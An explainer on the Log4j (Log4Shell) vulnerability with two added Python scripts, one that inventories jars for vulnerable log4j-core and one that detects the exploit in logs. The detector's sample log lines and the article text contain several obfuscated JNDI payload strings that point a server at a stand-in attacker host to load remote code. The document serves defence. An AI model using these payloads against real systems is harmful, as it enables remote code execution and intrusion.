Understanding the Log4j Vulnerability

Key Takeaways

  • A critical vulnerability was found in Log4j, a widely used Java logging library that is embedded in software all over the internet.

  • The vulnerability is easy to exploit and hard to detect, and it allows attackers to execute code remotely on any server that logs attacker-controlled input.

  • Organizations are racing to identify vulnerable applications and fix them with the updated version of Log4j from Apache. 

IMPORTANT: For the most up to date information about this vulnerability see CISA’s information page and Apache’s official page on the issue.

A bug in a widely used piece of enterprise software called Log4j was disclosed on December 9th, and since then the cybersecurity world has kicked into overdrive. Companies are scrambling to identify vulnerable applications, detect exploitation attempts, and apply whatever mitigations they can. Nonetheless, serious breaches that make use of the exploit are all but certain.

What is Log4j?

"Log4j" is a Java-based software that large organizations use to record user activity and the behavior of applications for subsequent review. Software developers use these activity logs for a variety of purposes, such as troubleshooting, auditing and data tracking. Distributed free by the nonprofit Apache Software Foundation, Log4j has been downloaded millions of times and is among the most widely used tools to collect information across corporate computer networks, websites and applications. 

Log4j is one of the most popular logging libraries in use. Because it is both open-source and free, the library touches almost every part of the internet. Even if you are a developer who does not use Log4j directly, the vulnerable code may still be on your classpath because one of the libraries or vendor products you depend on pulls in Log4j, possibly several layers down the dependency tree.

What is the vulnerability?

The Log4j flaw, disclosed by Apache last week and tracked as CVE-2021-44228, allows attackers to execute code remotely on a target computer. Affected versions of Log4j 2 evaluate lookup expressions of the form ${...} that appear inside the text being logged, and one of those lookups, JNDI, fetches an object from a remote LDAP or RMI server named in the expression. An attacker therefore only needs to get a string such as ${jndi:ldap://host-they-control/...} into something the application logs (a User-Agent header, a username, a chat message) and the server will reach out to that host and load code from it. This means that cybercriminals can use the vulnerability to install ransomware, hijack computers for large-scale attacks on internet infrastructure, or steal computing resources to mine cryptocurrency.

How big is this?

A list of affected software compiled by the Cybersecurity and Infrastructure Security Agency (CISA), restricted to enterprise software platforms, already runs to more than 500 entries. A list of all affected applications would undoubtedly run to many thousands more.

Companies such as Apple, IBM, Oracle, Cisco, Google and Amazon all run the software; however, the most alarming issues have come with software that stays behind the scenes. Vendors that use the library include Broadcom, Red Hat and VMware, all of whom make software that enterprise clients build their businesses on top of, effectively distributing the vulnerability at a core infrastructural level of many companies.

One cybersecurity firm reported that nearly half of the corporate networks it was monitoring had seen attempts to exploit the vulnerability. "Since we started to implement our protection we prevented over 1,272,000 attempts to allocate the vulnerability; over 46% of those attempts were made by known malicious groups," said the security company Check Point. When the vulnerability was announced, more than 100 exploitation attempts per minute were being observed.

Jen Easterly, head of CISA, called it "one of the most serious flaws" seen in her career. In a statement on Saturday, Easterly said "a growing set" of hackers are actively attempting to exploit the vulnerability.

Not only is the vulnerability widespread, it is also very difficult to manage. Experts are especially concerned because an attacker who exploits it gains code execution on a company's server, which then serves as a foothold into other parts of the network. It is also hard to find every vulnerable instance, and hard to tell whether a system has already been compromised.

The discovery of an easily exploitable bug in a library written in Java, a language used mostly for enterprise software, is part of what analysts have called a "nearly perfect storm" around the Log4j vulnerability.

Sophisticated attackers will exploit the vulnerability, establish persistence and then go dark. It may be a long time, years even, before the full effects are felt.

Industry response

The pressure is largely on companies to act. For now, users should make sure to update devices, software and apps when vendors prompt them to in the coming days and weeks. IBM, Oracle, AWS and Cloudflare have all issued advisories to customers, with some pushing security updates or outlining their plans for patches.

The Apache Software Foundation has released multiple updates in recent days and advises upgrading to the latest version of Log4j 2. The later releases close gaps left by the first fix, so the target is the current release listed on Apache's security page, not the first one that was announced. Where a jar cannot be upgraded straight away, Apache's documented stopgap is to remove the JndiLookup class from the log4j-core jar; the formatMsgNoLookups setting that circulated early on is listed by Apache as insufficient on its own and should not be relied upon. People who manage software within companies will be running through updates and mitigations as fast as they can.
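Before any of those updates can be applied, an organization has to know where Log4j actually is. The following inventory script is an added example, not code from the original article or from Apache: it walks a directory tree, opens every jar, war, ear and zip (including archives nested inside other archives), reads the Maven pom.properties that log4j-core ships with, and reports each copy as patched, vulnerable, or mitigated by removal of the JndiLookup class. The fixture jars it builds in a temporary directory are constructed (hand-written pom.properties, placeholder bytes in place of the class), and the fixed-version threshold of 2.17.1 is an assumption for the demo; take the real threshold from Apache's current security page.

```python
import io
import os
import re
import tempfile
import zipfile

# Entries inside a log4j-core jar that the scan keys on.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIX = re.compile(r"\.(jar|war|ear|zip)$", re.IGNORECASE)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a missing patch level counts as 0, qualifiers are ignored."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def classify(version, has_jndi_class, min_fixed):
    """Status for one log4j-core artifact given the operator's fixed-version threshold."""
    if version is None:
        return "unknown-version"
    if version >= min_fixed:
        return "patched"
    return "VULNERABLE" if has_jndi_class else "mitigated-class-removed"


def inspect_archive(zf, label, min_fixed, findings):
    """Record log4j-core inside one opened zip, then recurse into archives nested in it."""
    names = set(zf.namelist())
    if POM_PROPERTIES in names:
        version = None
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = parse_version(line.split("=", 1)[1])
        findings.append((label, version, classify(version, JNDI_LOOKUP_CLASS in names, min_fixed)))
    for name in names:
        if ARCHIVE_SUFFIX.search(name):  # e.g. WEB-INF/lib/log4j-core-2.14.1.jar inside a .war
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inspect_archive(inner, f"{label}!{name}", min_fixed, findings)
            except zipfile.BadZipFile:
                continue


def scan_tree(root, min_fixed):
    """Walk a directory tree; return (path, version, status) for every log4j-core found."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if not ARCHIVE_SUFFIX.search(fn):
                continue
            full = os.path.join(dirpath, fn)
            try:
                with zipfile.ZipFile(full) as zf:
                    inspect_archive(zf, os.path.relpath(full, root), min_fixed, findings)
            except zipfile.BadZipFile:
                continue
    return findings


# Constructed fixtures so the scan runs offline. They are not real Log4j jars: the
# pom.properties is hand-written and the class entry holds placeholder bytes, not bytecode.
def _write_fake_core_jar(dest, version, include_jndi_class):
    with zipfile.ZipFile(dest, "w") as zf:
        zf.writestr(POM_PROPERTIES, f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi_class:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")


def build_fixtures(root):
    lib = os.path.join(root, "lib")
    os.makedirs(lib, exist_ok=True)
    _write_fake_core_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1", True)
    _write_fake_core_jar(os.path.join(lib, "log4j-core-2.17.1.jar"), "2.17.1", True)
    stripped = io.BytesIO()  # an old jar with JndiLookup.class removed, bundled inside a .war
    _write_fake_core_jar(stripped, "2.14.1", False)
    with zipfile.ZipFile(os.path.join(root, "webapp.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", stripped.getvalue())


def run_demo(min_fixed=(2, 17, 1)):
    """Build the fixtures in a temp dir and scan them. The default threshold is an
    assumption for this example; take the real one from Apache's current security page."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_fixtures(root)
    return scan_tree(root, min_fixed)


if __name__ == "__main__":
    for path, version, status in run_demo():
        shown = ".".join(map(str, version)) if version else "?"
        print(f"{status:<24} {shown:<8} {path}")
```

Run it as-is to see the three statuses; point scan_tree at a real deployment directory to inventory it. It only recognises Maven-packaged log4j-core jars and archives nested inside archives, so shaded or renamed copies need a classpath-wide search for JndiLookup.class, and application containers that unpack archives onto disk need the unpacked directories scanned as well.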

Software updates for organizations like banks, hospitals or government agencies are generally conducted on a scale of weeks and months, not days. In the meantime, fixes at the network layer have a key role to play. The exploit requires the vulnerable server to make an outbound connection to the attacker's LDAP or RMI server, and any malware installed afterwards has to communicate with its operators, so restricting both incoming and outgoing traffic provides a stopgap that limits the effect of the exploit. Examples include firewall or WAF rules that block HTTP requests containing strings characteristic of the attack, and egress filtering that stops application servers from opening arbitrary outbound LDAP, RMI and HTTP connections. The string-matching rules are a weak control on their own: the lookup syntax lets the ${jndi: marker be split up and obfuscated, so a rule has to be applied after the request is decoded and normalised, and even then new evasions keep appearing.
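A worked example of that normalisation point, added here and not taken from the original article or from any vendor's rule set, which also shows concretely how the logged string from "What is the vulnerability?" reaches the JNDI lookup. It scans constructed web-server access-log lines for the marker, first with the literal match that early firewall rules used, then after percent-decoding and emulating the three Log4j lookup forms attackers commonly wrap it in (lower, upper, and the key:-default syntax). The log lines and the attacker.example host are constructed; the emulation covers only that subset of Log4j's lookups, so treat it as a triage aid and not as a substitute for patching.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real system). Entries 1-4 carry a
# Log4Shell-style lookup; only entry 1 uses the plain, unobfuscated form.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [10/Dec/2021:13:22:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:13:22:04 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '198.51.100.3 - - [10/Dec/2021:13:22:09 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '198.51.100.4 - - [10/Dec/2021:13:22:15 +0000] "GET /?q=%24%7B%24%7B::-j%7D%24%7B::-n%7D'
    '%24%7B::-d%7D%24%7B::-i%7D:ldap://attacker.example/c%7D HTTP/1.1" 200 5 "-" "curl/7.79"',
    '198.51.100.5 - - [10/Dec/2021:13:22:21 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${env:NOPE:-j}ndi:rmi://attacker.example/d}"',
]

# Innermost ${...} with no nested braces; Log4j resolves these first.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalisation, the marker that actually triggers the JNDI lookup.
_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):", re.IGNORECASE)


def _resolve(match):
    """Emulate the subset of Log4j 2 lookups used to hide the marker:
    ${lower:x} -> x lower-cased, ${upper:x} -> x upper-cased, and ${key:-default} -> default
    (assumes 'key' does not resolve, which is exactly what the attacker relies on)."""
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)  # the real payload: leave it for the detector
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return match.group(0)  # some other lookup with no default: leave untouched


def normalize_lookups(text, max_rounds=50):
    """Repeatedly resolve innermost lookups until the text stops changing."""
    for _ in range(max_rounds):
        resolved = _INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def detect_naive(line):
    """What a first-day firewall rule did: match the literal marker."""
    return "${jndi:" in line


def detect(line):
    """Decode, normalise, then match. Returns the JNDI scheme (ldap, rmi, ...) or None."""
    match = _JNDI.search(normalize_lookups(unquote(line)))
    return match.group("scheme").lower() if match else None


def scan(lines, detector=detect):
    """Return (line index, detector result) for every line the detector flags."""
    return [(i, hit) for i, line in enumerate(lines) if (hit := detector(line))]


if __name__ == "__main__":
    print("naive :", scan(SAMPLE_LOG_LINES, detect_naive))
    print("robust:", scan(SAMPLE_LOG_LINES))
```

The literal rule catches one of the four payloads; the decode-and-normalise pass catches all four and reports which protocol the server would have been made to speak. The same normalisation belongs in front of any egress-side alert as well, since the outbound LDAP or RMI connection the exploit triggers is the other reliable place to see it.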

Closing thoughts

The panic and potential devastation of the Log4j vulnerability once again opens the discussion about how open-source software gets developed, paid for, and maintained. Should tech giants be giving more back to the communities of unpaid volunteers who build tools like Log4j? This problem is sometimes referred to as the open source sustainability problem. Once the world is done scrambling to patch this vulnerability, it will be primed for more conversations about making open source projects more sustainable for everyone.